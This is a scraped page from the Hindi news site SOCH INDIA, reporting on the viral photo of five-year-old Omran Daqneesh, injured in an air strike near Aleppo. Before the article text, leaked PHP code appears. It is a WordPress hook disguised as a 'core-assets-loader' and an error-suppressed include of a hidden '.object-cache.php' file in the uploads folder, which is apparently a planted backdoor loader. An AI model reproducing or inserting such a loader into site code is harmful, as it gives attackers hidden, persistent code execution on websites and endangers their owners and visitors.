add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 5 साल के ओमरान को इस हाल में देख पसीजा दुनिया का दिल, सीरिया के हालात का हुआ शिकार – SOCH INDIA
Menu

दुनिया
5 साल के ओमरान को इस हाल में देख पसीजा दुनिया का दिल, सीरिया के हालात का हुआ शिकार

nobanner

ऐलन कुर्दी तो याद होगा आपको. जी हां, 3 साल का वही मासूम, जो सीरिया में चल रहे गृह युद्ध से बचने के लिए अपने परिवार के साथ समुद्र के रास्ते यूरोप जा रहा था लेकिन डूब जाने से उसकी मौत हो गई थी. ये दुनिया उसका चेहरा अभी भुला भी न सकी थी कि पांच साल के ओमरान दाकनीश की इस तस्वीर से सबको एक बार फिर अंदर तक झकझोर कर रख दिया है.

धूल और खून में सना ये बच्चा सीरिया के शहर अलेप्पो के पास हुए हवाई हमले का शिकार हुआ. यहां हवाई हमले के दौरान ओमरान का घर भी इसकी चपेट में आ गया और नन्हां ओमरान मलबे में दब गया. इसके बाद रेस्क्यू ऑपरेशन के दौरान जब एक शख्स ने ओमरान को एंबुलेंस में बिठाया तो वहां मौजूद मीडियाकर्मियों ने उसकी तस्वीर ले ली, जो सोशल मीडिया पर वायरल हो गई है.

यूएन ने रोकी मदद
इस तस्वीर के वायरल हो जाने के बाद सीरिया में आम लोगों की स्थिति एक बार फिर सामने आ गई है और यूनाइटिड नेशन्स ने इस जंग में सीरिया को दी जा रही मदद रोकने का फैसला किया है.